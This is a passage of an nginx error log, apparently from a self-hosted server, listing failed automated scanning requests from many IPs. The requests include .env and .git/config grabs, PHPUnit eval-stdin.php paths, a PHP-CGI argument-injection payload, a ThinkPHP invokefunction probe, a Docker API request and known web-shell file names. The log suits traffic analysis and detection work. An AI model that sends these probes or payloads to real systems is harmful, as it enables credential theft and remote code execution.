+2026/01/28 14:57:47 [error] 307#307: *29583 open() "/var/www/html/store/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /store/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:47 [error] 307#307: *29584 open() "/var/www/html/cdn/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /cdn/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:47 [error] 307#307: *29585 open() "/var/www/html/dashboard/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /dashboard/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:47 [error] 308#308: *29586 open() "/var/www/html/test/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /test/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:47 [error] 308#308: *29587 open() "/var/www/html/smtp/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /smtp/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:47 [error] 308#308: *29588 open() "/var/www/html/ftp/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /ftp/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:47 [error] 308#308: *29589 open() "/var/www/html/wiki/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /wiki/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:48 [error] 308#308: *29590 open() "/var/www/html/help/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /help/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:48 [error] 308#308: *29591 open() "/var/www/html/blog/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /blog/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 15:19:42 [error] 308#308: *29600 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 15:20:48 [error] 308#308: *29601 "/var/www/html/bins/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bins/ HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 15:35:11 [error] 309#309: *29606 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 16:23:18 [error] 308#308: *31123 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 17:11:08 [error] 318#318: *31141 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 18:42:12 [error] 316#316: *31170 "/var/www/html/bin/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bin/ HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 18:44:18 [error] 316#316: *31173 open() "/var/www/html/hudson" failed (2: No such file or directory), client: 20.106.56.201, server: localhost-nginx-proxy-manager, request: "GET /hudson HTTP/1.1", host: "91.82.215.191" +2026/01/28 18:45:34 [error] 316#316: *31175 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 19:21:52 [error] 316#316: *31202 open() "/var/www/html/ncsi.txt" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET http://www.msftncsi.com/ncsi.txt HTTP/1.1", host: "www.msftncsi.com", referrer: "http://91.82.215.191/" +2026/01/28 19:21:53 [error] 317#317: *31203 "/var/www/html/HNAP1/index.html" is not found (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /HNAP1/ HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/28 19:21:53 [error] 317#317: *31204 open() "/var/www/html/sqlite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /sqlite/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/28 19:21:53 [error] 317#317: *31205 open() "/var/www/html/sqlitemanager/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /sqlitemanager/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/28 19:21:53 [error] 317#317: *31206 open() "/var/www/html/SQLiteManager/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQLiteManager/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/28 19:21:53 [error] 317#317: *31207 open() "/var/www/html/SQLite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQLite/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/28 19:21:53 [error] 317#317: *31208 open() "/var/www/html/SQlite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQlite/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/28 19:21:53 [error] 317#317: *31209 open() "/var/www/html/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/28 19:21:53 [error] 317#317: *31210 open() "/var/www/html/test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/28 19:21:53 [error] 317#317: *31211 open() "/var/www/html/SQLiteManager-1.2.4/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQLiteManager-1.2.4/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/28 19:21:53 [error] 317#317: *31212 open() "/var/www/html/agSearch/SQlite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /agSearch/SQlite/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/28 19:49:24 [error] 316#316: *32715 open() "/var/www/html/wiki" failed (2: No such file or directory), client: 162.142.125.32, server: localhost-nginx-proxy-manager, request: "GET /wiki HTTP/1.1", host: "91.82.215.191" +2026/01/28 20:16:27 [error] 316#316: *32726 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:51:49 [error] 317#317: *32746 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:51:50 [error] 317#317: *32746 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:51:51 [error] 317#317: *32746 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:51:51 [error] 317#317: *32746 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:51:52 [error] 317#317: *32746 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:51:53 [error] 317#317: *32746 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:51:53 [error] 317#317: *32746 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:51:54 [error] 317#317: *32746 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:51:55 [error] 317#317: *32746 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:51:55 [error] 317#317: *32746 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:51:56 [error] 317#317: *32746 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:51:57 [error] 317#317: *32746 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:51:57 [error] 317#317: *32746 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:51:58 [error] 317#317: *32746 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:51:58 [error] 317#317: *32746 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:51:59 [error] 317#317: *32746 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:51:59 [error] 317#317: *32746 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:00 [error] 317#317: *32746 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:00 [error] 317#317: *32746 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:01 [error] 317#317: *32746 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:02 [error] 317#317: *32746 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:03 [error] 317#317: *32746 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:04 [error] 317#317: *32746 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:04 [error] 317#317: *32746 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:05 [error] 317#317: *32746 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:05 [error] 317#317: *32746 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:06 [error] 317#317: *32746 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:06 [error] 317#317: *32746 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:07 [error] 317#317: *32746 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:07 [error] 317#317: *32746 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:08 [error] 317#317: *32746 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:08 [error] 317#317: *32746 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:09 [error] 317#317: *32746 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:09 [error] 317#317: *32746 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:10 [error] 317#317: *32746 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:10 [error] 317#317: *32746 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:10 [error] 317#317: *32746 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:11 [error] 317#317: *32746 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:12 [error] 317#317: *32746 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:12 [error] 317#317: *32746 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:52:14 [error] 317#317: *32746 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 60.22.27.17, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 20:55:58 [error] 317#317: *32750 open() "/var/www/html/server-status" failed (2: No such file or directory), client: 35.216.189.16, server: localhost-nginx-proxy-manager, request: "GET /server-status HTTP/1.1", host: "91.82.215.191" +2026/01/28 20:55:58 [error] 317#317: *32751 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 35.216.189.16, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "91.82.215.191" +2026/01/28 20:55:59 [error] 317#317: *32752 open() "/var/www/html/.env" failed (2: No such file or directory), client: 35.216.189.16, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 20:55:59 [error] 317#317: *32753 open() "/var/www/html/telescope/requests" failed (2: No such file or directory), client: 35.216.189.16, server: localhost-nginx-proxy-manager, request: "GET /telescope/requests HTTP/1.1", host: "91.82.215.191" +2026/01/28 20:55:59 [error] 318#318: *32754 open() "/var/www/html/info.php" failed (2: No such file or directory), client: 35.216.189.16, server: localhost-nginx-proxy-manager, request: "GET /info.php HTTP/1.1", host: "91.82.215.191" +2026/01/28 20:55:59 [error] 318#318: *32755 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 35.216.189.16, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.215.191" +2026/01/28 21:17:31 [error] 318#318: *32761 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.64.104.65, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "91.82.215.191" +2026/01/28 21:46:29 [error] 318#318: *32908 "/var/www/html/backup/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /backup/ HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 21:49:47 [error] 318#318: *32909 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 21:55:31 [error] 318#318: *32911 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 22:25:01 [error] 315#315: *32922 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 213.209.159.181, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.215.191" +2026/01/28 22:36:10 [error] 315#315: *32924 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 22:44:16 [error] 315#315: *32925 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 52.141.6.155, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/28 22:44:16 [error] 315#315: *32925 open() "/var/www/html/rip.php" failed (2: No such file or directory), client: 52.141.6.155, server: localhost-nginx-proxy-manager, request: "GET /rip.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/28 22:55:04 [error] 322#322: *32929 open() "/var/www/html/actuator/health" failed (2: No such file or directory), client: 20.163.1.211, server: localhost-nginx-proxy-manager, request: "GET /actuator/health HTTP/1.1", host: "91.82.215.191" +2026/01/29 00:30:01 [error] 349#349: *33363 open() "/var/www/html/webmobile/login.html" failed (2: No such file or directory), client: 109.236.61.69, server: localhost-nginx-proxy-manager, request: "GET /webmobile/login.html HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 00:52:05 [error] 349#349: *33366 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 01:37:21 [error] 349#349: *33403 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 01:39:20 [error] 349#349: *33404 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 02:07:44 [error] 350#350: *33418 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 65.49.1.162, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "91.82.215.191" +2026/01/29 02:10:12 [error] 352#352: *34908 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 65.49.1.162, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "91.82.215.191" +2026/01/29 02:22:57 [error] 352#352: *34923 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 02:45:06 [error] 352#352: *34949 open() "/var/www/html/_profiler/phpinfo" failed (2: No such file or directory), client: 45.148.10.124, server: localhost-nginx-proxy-manager, request: "GET /_profiler/phpinfo HTTP/1.1", host: "91.82.215.191" +2026/01/29 02:51:02 [error] 349#349: *34954 open() "/var/www/html/_profiler/phpinfo" failed (2: No such file or directory), client: 45.148.10.124, server: localhost-nginx-proxy-manager, request: "GET /_profiler/phpinfo HTTP/1.1", host: "91.82.215.191" +2026/01/29 03:26:36 [error] 352#352: *36456 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 03:55:29 [error] 352#352: *36465 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 04:39:47 [error] 352#352: *36484 open() "/var/www/html/.env" failed (2: No such file or directory), client: 157.245.98.43, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" +2026/01/29 04:39:48 [error] 349#349: *36485 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 157.245.98.43, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.215.191" +2026/01/29 06:12:47 [error] 356#356: *36557 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 06:59:14 [error] 356#356: *36693 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/29 07:58:54 [error] 357#357: *36719 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:54 [error] 357#357: *36719 open() "/var/www/html/autoload_classmap.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //autoload_classmap.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:54 [error] 357#357: *36719 open() "/var/www/html/alfa.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //alfa.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:54 [error] 357#357: *36719 open() "/var/www/html/wp-includes/assets/index.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/assets/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:54 [error] 357#357: *36719 open() "/var/www/html/luxe.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /luxe.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:54 [error] 357#357: *36719 "/var/www/html/update/wpupex.php/index.html" is not found (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /update/wpupex.php/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:54 [error] 357#357: *36719 open() 